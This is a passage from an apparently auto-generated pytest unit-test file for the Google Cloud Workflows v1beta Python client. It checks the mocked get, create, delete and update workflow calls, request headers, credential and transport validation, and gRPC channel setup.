# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
workflows.Workflow(
name="name_value",
description="description_value",
state=workflows.Workflow.State.ACTIVE,
revision_id="revision_id_value",
service_account="service_account_value",
)
)
response = await client.get_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.GetWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workflows.Workflow)
assert response.name == "name_value"
assert response.description == "description_value"
assert response.state == workflows.Workflow.State.ACTIVE
assert response.revision_id == "revision_id_value"
assert response.service_account == "service_account_value"
@pytest.mark.asyncio
async def test_get_workflow_async_from_dict():
await test_get_workflow_async(request_type=dict)
def test_get_workflow_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.GetWorkflowRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
call.return_value = workflows.Workflow()
client.get_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_workflow_field_headers_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.GetWorkflowRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workflows.Workflow())
await client.get_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_workflow_flattened():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.Workflow()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_workflow(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_workflow_flattened_error():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_workflow(
workflows.GetWorkflowRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_workflow_flattened_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.Workflow()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workflows.Workflow())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_workflow(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_workflow_flattened_error_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_workflow(
workflows.GetWorkflowRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [workflows.CreateWorkflowRequest, dict,])
def test_create_workflow(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.create_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.CreateWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_create_workflow_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
client.create_workflow()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.CreateWorkflowRequest()
@pytest.mark.asyncio
async def test_create_workflow_async(
transport: str = "grpc_asyncio", request_type=workflows.CreateWorkflowRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.create_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.CreateWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_create_workflow_async_from_dict():
await test_create_workflow_async(request_type=dict)
def test_create_workflow_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.CreateWorkflowRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.create_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_workflow_field_headers_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.CreateWorkflowRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.create_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_workflow_flattened():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_workflow(
parent="parent_value",
workflow=workflows.Workflow(name="name_value"),
workflow_id="workflow_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].workflow
mock_val = workflows.Workflow(name="name_value")
assert arg == mock_val
arg = args[0].workflow_id
mock_val = "workflow_id_value"
assert arg == mock_val
def test_create_workflow_flattened_error():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_workflow(
workflows.CreateWorkflowRequest(),
parent="parent_value",
workflow=workflows.Workflow(name="name_value"),
workflow_id="workflow_id_value",
)
@pytest.mark.asyncio
async def test_create_workflow_flattened_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_workflow(
parent="parent_value",
workflow=workflows.Workflow(name="name_value"),
workflow_id="workflow_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].workflow
mock_val = workflows.Workflow(name="name_value")
assert arg == mock_val
arg = args[0].workflow_id
mock_val = "workflow_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_workflow_flattened_error_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_workflow(
workflows.CreateWorkflowRequest(),
parent="parent_value",
workflow=workflows.Workflow(name="name_value"),
workflow_id="workflow_id_value",
)
@pytest.mark.parametrize("request_type", [workflows.DeleteWorkflowRequest, dict,])
def test_delete_workflow(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.DeleteWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_workflow_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
client.delete_workflow()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.DeleteWorkflowRequest()
@pytest.mark.asyncio
async def test_delete_workflow_async(
transport: str = "grpc_asyncio", request_type=workflows.DeleteWorkflowRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.DeleteWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_workflow_async_from_dict():
await test_delete_workflow_async(request_type=dict)
def test_delete_workflow_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.DeleteWorkflowRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_workflow_field_headers_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.DeleteWorkflowRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_workflow_flattened():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_workflow(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_workflow_flattened_error():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_workflow(
workflows.DeleteWorkflowRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_workflow_flattened_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_workflow(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_workflow_flattened_error_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_workflow(
workflows.DeleteWorkflowRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [workflows.UpdateWorkflowRequest, dict,])
def test_update_workflow(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.update_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.UpdateWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_update_workflow_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
client.update_workflow()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.UpdateWorkflowRequest()
@pytest.mark.asyncio
async def test_update_workflow_async(
transport: str = "grpc_asyncio", request_type=workflows.UpdateWorkflowRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.update_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.UpdateWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_update_workflow_async_from_dict():
await test_update_workflow_async(request_type=dict)
def test_update_workflow_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.UpdateWorkflowRequest()
request.workflow.name = "workflow.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.update_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "workflow.name=workflow.name/value",) in kw[
"metadata"
]
@pytest.mark.asyncio
async def test_update_workflow_field_headers_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.UpdateWorkflowRequest()
request.workflow.name = "workflow.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.update_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "workflow.name=workflow.name/value",) in kw[
"metadata"
]
def test_update_workflow_flattened():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_workflow(
workflow=workflows.Workflow(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].workflow
mock_val = workflows.Workflow(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_workflow_flattened_error():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_workflow(
workflows.UpdateWorkflowRequest(),
workflow=workflows.Workflow(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_workflow_flattened_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_workflow(
workflow=workflows.Workflow(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].workflow
mock_val = workflows.Workflow(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_workflow_flattened_error_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_workflow(
workflows.UpdateWorkflowRequest(),
workflow=workflows.Workflow(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.WorkflowsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.WorkflowsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkflowsClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.WorkflowsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = WorkflowsClient(client_options=options, transport=transport,)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = WorkflowsClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.WorkflowsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = WorkflowsClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.WorkflowsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = WorkflowsClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.WorkflowsGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.WorkflowsGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize(
"transport_class",
[transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport,],
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
assert isinstance(client.transport, transports.WorkflowsGrpcTransport,)
def test_workflows_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.WorkflowsTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_workflows_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.workflows_v1beta.services.workflows.transports.WorkflowsTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.WorkflowsTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"list_workflows",
"get_workflow",
"create_workflow",
"delete_workflow",
"update_workflow",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
# Additionally, the LRO client (a property) should
# also raise NotImplementedError
with pytest.raises(NotImplementedError):
transport.operations_client
def test_workflows_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.workflows_v1beta.services.workflows.transports.WorkflowsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.WorkflowsTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_workflows_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.workflows_v1beta.services.workflows.transports.WorkflowsTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.WorkflowsTransport()
adc.assert_called_once()
def test_workflows_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
WorkflowsClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport,],
)
def test_workflows_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.WorkflowsGrpcTransport, grpc_helpers),
(transports.WorkflowsGrpcAsyncIOTransport, grpc_helpers_async),
],
)
def test_workflows_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
create_channel.assert_called_with(
"workflows.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=["1", "2"],
default_host="workflows.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"transport_class",
[transports.WorkflowsGrpcTransport, transports.WorkflowsGrpcAsyncIOTransport],
)
def test_workflows_grpc_transport_client_cert_source_for_mtls(transport_class):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds,
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback,
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert, private_key=expected_key
)
def test_workflows_host_no_port():
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="workflows.googleapis.com"
),
)
assert client.transport._host == "workflows.googleapis.com:443"
def test_workflows_host_with_port():
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="workflows.googleapis.com:8000"
),
)
assert client.transport._host == "workflows.googleapis.com:8000"
def test_workflows_grpc_transport_channel():
channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.WorkflowsGrpcTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
def test_workflows_grpc_asyncio_transport_channel():
channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.WorkflowsGrpcAsyncIOTransport(
host="squid.clam.whelk", channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
